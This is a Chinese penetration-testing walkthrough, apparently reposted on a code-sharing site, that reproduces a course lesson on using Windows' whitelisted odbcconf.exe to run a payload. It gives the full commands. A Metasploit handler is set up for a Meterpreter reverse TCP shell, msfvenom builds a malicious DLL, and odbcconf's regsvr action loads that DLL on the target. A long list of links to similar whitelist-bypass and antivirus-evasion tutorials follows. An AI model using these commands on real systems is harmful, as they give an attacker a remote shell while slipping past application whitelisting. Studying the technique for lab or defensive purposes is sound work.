渗透测试-基于白名单执行payload--Odbcconf - 代码天地

渗透测试-基于白名单执行payload--Odbcconf

其他 2019-05-02 15:14:43 阅读次数: 0

复现亮神课程基于白名单执行payload--Odbcconf

0x01 Odbcconf简介：

ODBCCONF.exe是一个命令行工具，允许配置ODBC驱动程序和数据源。

微软官方文档：
https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017

ODBCCONF.exe是一个与Microsoft公司的Microsoft数据访问组件相关联的进程。

说明：Odbcconf.exe所在路径已被系统添加PATH环境变量中，因此，Odbcconf命令可识别，需注意x86，x64位的Odbcconf调用。

Windows 2003 默认位置：

C:\WINDOWS\system32\odbcconf.exe

C:\WINDOWS\SysWOW64\odbcconf.exe

Windows 7 默认位置：

C:\Windows\System32\odbcconf.exe

C:\Windows\SysWOW64\odbcconf.exe

0x02 复现

攻击机：kali

靶机：win7

Msf配置:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.190.141

lhost => 192.168.190.141

msf5 exploit(multi/handler) > show options

 

Module options (exploit/multi/handler):

 

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

 

 

Payload options (windows/meterpreter/reverse_tcp):

 

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST     192.168.190.141  yes       The listen address (an interface may be specified)

   LPORT     4444             yes       The listen port

 

 

Exploit target:

 

   Id  Name

   --  ----

   0   Wildcard Target

生成木马(这里生成的64位):

   Msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.190.141 lport=4444 -f dll > hacker.dll

靶机执行:

C:\Users\Administrator\Desktop\Odbcconf>C:\Windows\System32\odbcconf.exe /a {reg

svr C:\Users\Administrator\Desktop\Odbcconf\hacker.dll}

猜你喜欢

转载自www.cnblogs.com/-qing-/p/10802302.html

渗透测试-基于白名单执行payload--Odbcconf

渗透测试-基于白名单执行payload--Cmstp

渗透测试-基于白名单执行payload--Csc

渗透测试-基于白名单执行payload--Msiexec

渗透测试-基于白名单执行payload--Forfiles

渗透测试-基于白名单执行payload--Pcalua

对亮神基于白名单odbcconf.exe执行payload第十er季复现

渗透测试-基于白名单执行payload--Regsvr32

渗透测试-基于白名单执行payload--zipfldr.dll

【免杀篇】远控免杀专题(59)-白名单Odbcconf.exe执行payload

对亮神基于白名单 Msiexec 执行 Payload 第八季复现

对亮神基于白名单Rundll32.exe执行payload第十一季复现

对亮神基于白名单Wmic 执行 payload 第十季复现

对亮神基于白名单Mshta.exe 执行 payload 第五季复现

对亮神基于白名单Regsvr32 执行 payload 第九季复现

对亮神基于白名单 Csc.exe 执行 payload 第七季复现

对亮神基于白名单 Compiler.Exe 执行 Payload 第六季复现

对亮神基于白名单Regasm.Exe 执行 payload 第三季复现

对亮神基于白名单 PsExec 执行 payload 第十三季复现

对亮神基于白名单regsvcs.exe执行payload第四季复现

对亮神基于白名单Installutil.exe 执行 payload 第二季复现

对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现

【免杀篇】远控免杀专题(62)-白名单CScript/WScript执行payload

【免杀篇】远控免杀专题(57)-白名单Url.dll执行payload

【免杀篇】远控免杀专题(56)-白名单zipfldr.dll执行payload

【免杀篇】远控免杀专题(55)-白名单Pcalua.exe执行payload

【免杀篇】远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

【免杀篇】远控免杀专题(53)-白名单WMIC.exe执行payload

【免杀篇】远控免杀专题(52)-白名单psexec.exe执行payload

【免杀篇】远控免杀专题(51)-白名单msdeloy.exe执行payload

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

curl的POST请求，封装方法

8.1.1. Integer Types

Java基础 Day05(个人复习整理)

Python - Django - 中间件 process_exception

小L的试卷

【Shell编程】（函数）判断用户是否存在

python(css样式)

spring ant path 匹配原则 - 【笔记】

《JavaScript与JScript从入门到精通》(美)James.Jaworski.中译本.扫描版.pdf

Eclipse运行带参数的java程序

每日归档

更多

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)